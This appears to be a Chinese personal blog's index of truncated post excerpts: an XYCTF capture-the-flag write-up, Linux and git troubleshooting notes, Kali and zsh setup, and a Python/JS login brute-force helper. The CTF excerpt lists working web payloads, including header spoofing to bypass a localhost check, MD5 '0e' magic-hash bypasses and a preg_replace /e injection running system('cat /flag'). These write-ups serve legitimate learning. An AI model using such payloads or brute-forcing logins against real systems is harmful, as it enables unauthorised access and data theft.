XYCTF_WP
XYCTF_WP_BY_Gr%1m
Webezhttp登陆框,注释藏密码,robots.txt
登陆看看,事多的很,来自yuanshen.com, XYCTF ua头,本地地址绕过
Referer: yuanshen.com
User-Agent: XYCTF
Client-Ip: 127.0.0.1
Via: ymzx.qq.com
Cookies: XYCTF=1
warmup先过md5弱比较0e绕过,然后双0e, 然后覆盖变量0e绕过
?val1=s1885207154a&val2=s1836677006a&md5=0e215962017&XYCTF=s1885207154a&XY=s1885207154a
没看到执行命令,preg_replace /e模式代码执行,intval可以数组绕过
?a=/sss/e&b=system(‘cat /flag’)&c= ...
XYCTF Crypto 部分wp
Sign1n & Sign1n_reverg题目:
leak = bin(int(flag))
while 1:
leak += "0"
if len(leak) == 514:
break
def swap_bits(input_str):
input_list = list(input_str[2:])
length = len(input_list)
for i in range(length // 2):
temp = input_list[i]
input_list[i] = input_list[length - 1 - i]
input_list[length - 1 - i] = temp
return ''.join(input_list)
input_str = leak
result = swap_bits(input_str)
a = result
def custom_add(input_str):
input_l ...
报错:libcairo.so.2: undefined symbol: FT_Get_Color_Glyph_Laye
钉钉运行无反应报错:libcairo.so.2: undefined symbol: FT_Get_Color_Glyph_Laye
Linux使用者+社畜每天上班日常,打开QQ,打开钉钉,打开spotify
这天事发突然钉钉无反应,上网搜了半天也没发现有什么说法。
然后更新了新的钉钉也不行,所以怀疑是某次apt更新把库文件更新了导致钉钉无法正常运行
下面是问题排查的一些思路
突然发现钉钉无反应,进入命令行运行执行结果
问题排查#利用strace追踪执行程序的过程
strace ./Elevator.sh
老版本报错
新版本报错
寻找报错点文件,查看版本
排查结论:libcairo.so.2调用系统库文件的版本不对应问题解决上网搜索了很多,并没有解决方法,GPT也不能给出一个答案。
便请教了群里的大佬:将可用的库文件放进钉钉的执行程序中,并且赋值调用
不要手贱的去apt这个deb, 关于lib的文件一定要正常的去apt install,不要自己安装,不然系统会裂开!
正确做法:
修改启动程序:要注意下面两个判断,根据实际情况放置合适的位置:
修改preload_libs ...
第二次git成功小记
第二次git小记push代码报错解决
事情起因于一次报错:不能push代码
git push origin master
To codehub.xxx.com:xxx/xxx.git
! [rejected] master -> master (non-fast-forward)
error: failed to push some refs to 'codehub.dxxx.com:xxx/xxx.git'
解决:git clone 仓库代码,将clone下来的文件夹下面的.git文件夹复制到要上传代码的文件夹下面cp -r ./.git ../xxx/
cd ../xxx/
git add . && git commit -m "xxxx"
git push
后续 – bench分支创建后面就是一些我本来想进行的一些操作
当你想要将原来的 master 分支中的代码转移到一个新创建的 old 分支,然后将新的代码推送到 master 分支时,可以按照以下步骤操作:
注意:在执行这些操作之前,请确保你的工作目录中没有未提交的更改,因为这些操 ...
kali-desktop
Kali桌面菜单编辑
简单说一下Kali桌面的使用
由于自己安装的一些应用每次都要去命令行,文件夹中寻找,很不方便。
桌面中可以开启左上角的whisker menu寻找应用直接搜索,非常方便。
那么今天我们来定制一下menu中的应用选项,众所周知Linux万物皆文件,
让我们来寻找一下。
寻找图标通过右键点击桌面图标,我们可以发现这些图标是以.desktop结尾的文件。
通过搜索这些文件,通过搜索引擎和ChatGPT的教学,我们知道了这些文件的路径。
.desktop 文件通常包含有关桌面环境中图标和启动器的信息。这些文件通常存储在以下位置:
全局应用程序菜单:通常存储在 /usr/share/applications/ 目录中。这里包含了系统范围的应用程序菜单项。
个人应用程序菜单:用户自定义的应用程序菜单项常存储在~/.local/share/applications/ 目录中。
你可以使用文本编辑器或命令行查看这些 .desktop 文件的内容。例如,要查看全局范围内的一个 .desktop 文件,可以使用以下命令:
bash
cat /usr/sha ...
zsh(Z-shell)终极shell
zsh(Z-shell)终极shell0x00 安装zsh当然是为了让我们输命令的时候更流畅啦~0x01 Zsh安装:
ubuntu: apt-get install zsh
centos : yum install zsh
检查系统的shell安装: cat /etc/shells,有了/bin/zsh则安装成功
0x02 使用zsh扩展集合: oh-my-zsh
oh-my-zsh 帮我们整理了一些常用的扩展功能和主题
先安装 git :sudo apt-get install git curl wget
安装oh-my-zsh
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
wget https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O - | sh
在以root用户运行,安装目录为:/ro ...
Vue-next-admin怎么跑不起来
Vue-next-admin怎么跑不起来前言个人打算开发(重写重构)一个项目,前后端分离重写,所以打算先把前端写了吧。
看到一个项目不错:Vue-next-admin 看看能不能节省点时间,直接小修一下了。
运行Vue-next-admin遇到的错误,(m(ark)d(own) 怎么跑不起来!)。
Error: Failed to scan for dependencies from entries:
/var/local/myVue/vue-next-admin/index.html
✘ [ERROR] No known conditions for "./lib/locale/lang/en" specifier in "element-plus" package [plugin vite:dep-scan]
src/i18n/index.ts:5:21:
5 │ import enLocale ...
利用python调用JS函数
利用python调用JS函数
利用python调用JS函数起因:在做登陆界面的渗透测试时,对登陆功能进行弱口令检测,对目标地址爆破遇到了前端加密。
刚好学习一下如何使用python调用js的函数,竟然真的可以,万能的Py神!
安装PyExecJS库,对js文件函数进行调用
PyExecJS 是使用最多的一种方式,底层实现方式是:在本地 JS 环境下运行 JS 代码支持的 JS 环境包含:Node.js、PyV8、PhantomJS、Nashorn 等首先,我们需要安装依赖包 PyExecJS
1python3 -m pip install -i https://pypi.tuna.tsinghua.edu.cn/simple PyExecJS
然后,从 JS 文件中读取源码
123456def js_from_file(file_name): # 读取js文件 with open(file_name, 'r', encoding='UTF-8') as file: jscode = file.read() ...
第一次 git 成功小记
第一次 git 成功小记
第一次 git 成功小记起因:
由于看到身边在用windows的师傅,同事们都在使用一些工具箱,每次渗透的时候打开工具一目了然,感觉很不错的样子。(男孩子天生就对工具/工具箱子有不可抵挡的向往)
于是自己开发了一个Linux版本的工具箱,参考了rolan、one-fox工具箱
下面是参考GPT的回答,结合过程中遇到的一些问题总结如下:
一、开启一个Github仓库将本地的项目放到GitHub上进行开源,您可以按照以下步骤使用命令行完成:
在GitHub上创建仓库:
打开GitHub网站,登录您的账号。
点击右上角的 “+” 图标,选择 “New repository”。
输入仓库名称和描述,选择公开(public)或私有(private),然后点击 “Create repository”。
在本地设置Git配置:
打开终端,进入您的PyCharm项目所在的目录。
设置您的用户名和电子邮件地址,这将与您的Git提交信息相关联:
git config --global user.name "Your Name"
git confi ...
Python匿名函数问题
Python循环调用匿名函数产生的问题
Python循环调用匿名函数产生的问题问题描述
我有三个字典类型变量和一个接收一个字符串参数的函数,
经过如下操作之后,我希望我的三个字典中每个name对应一个这个函数,
但是这样运行后发现所有的函数接收的path字符串全都是最后一个name对应的path
1234567891011# 有三个字典,字典键值对都为字符串类型 name: path,# 一个函数,接受一个字符串参数Gui_Dir1, Gui_Dir2, Gui_Dir3 = {},{},{}def custom(path:str) -> Nonefor dirs in [Gui_Dir1, Gui_Dir2, Gui_Dir3]: for name, path in dirs.items(): dirs.update({name: lambda: custom(path)})
期望结果:
12345Gui_Dir1 = {name1: path1 ...